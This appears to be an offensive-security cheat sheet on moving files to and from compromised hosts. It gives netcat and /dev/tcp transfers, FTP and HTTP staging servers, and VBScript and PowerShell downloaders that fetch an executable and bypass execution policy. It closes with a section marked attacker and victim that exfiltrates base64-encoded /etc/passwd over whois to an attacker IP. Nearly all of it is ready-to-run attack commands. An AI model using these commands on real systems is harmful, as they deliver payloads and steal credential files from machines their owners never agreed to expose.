File Transfert

netcat

nc -lvp 4444 < c:\windows\notepad.exe
nc -nv 172.16.237.158 4444 > notepad.exe
cat myFile.tgz >/dev/tcp/x.x.x.x/9001
nc -lnvp 9001 >myFile.tgz

FTP

Linux Server

pip install pyftpdlib

# Run (-w flag = anonymous write access)
python -m pyftpdlib -p 21 -w

Windows Client

echo open 172.16.237.245 21> ftp.txt
echo USER anonymous>> ftp.txt
echo thesecretpassword>> ftp.txt
echo bin>> ftp.txt
echo GET toto.exe>> ftp.txt
echo bye>> ftp.txt
ftp -v -n -s:ftp.txt

HTTP

Python Server

python -m SimpleHTTPServer 80
python3 -m http.server 8000

PHP

php -S 0.0.0.0:8000

Ruby

ruby -r webrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start"

Windows Client - vbscript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript wget.vbs http://172.16.237.245/toto.exe toto.exe

Windows client - Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://172.16.237.245/toto.exe" >>wget.ps1
echo $file = "toto.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Data Exfiltration

Whois

attacker

nc -l -v -p 43 | sed "s/ //g" | base64 -d

victim

whois -h $attackerIP -p 43 `cat /etc/passwd | base64`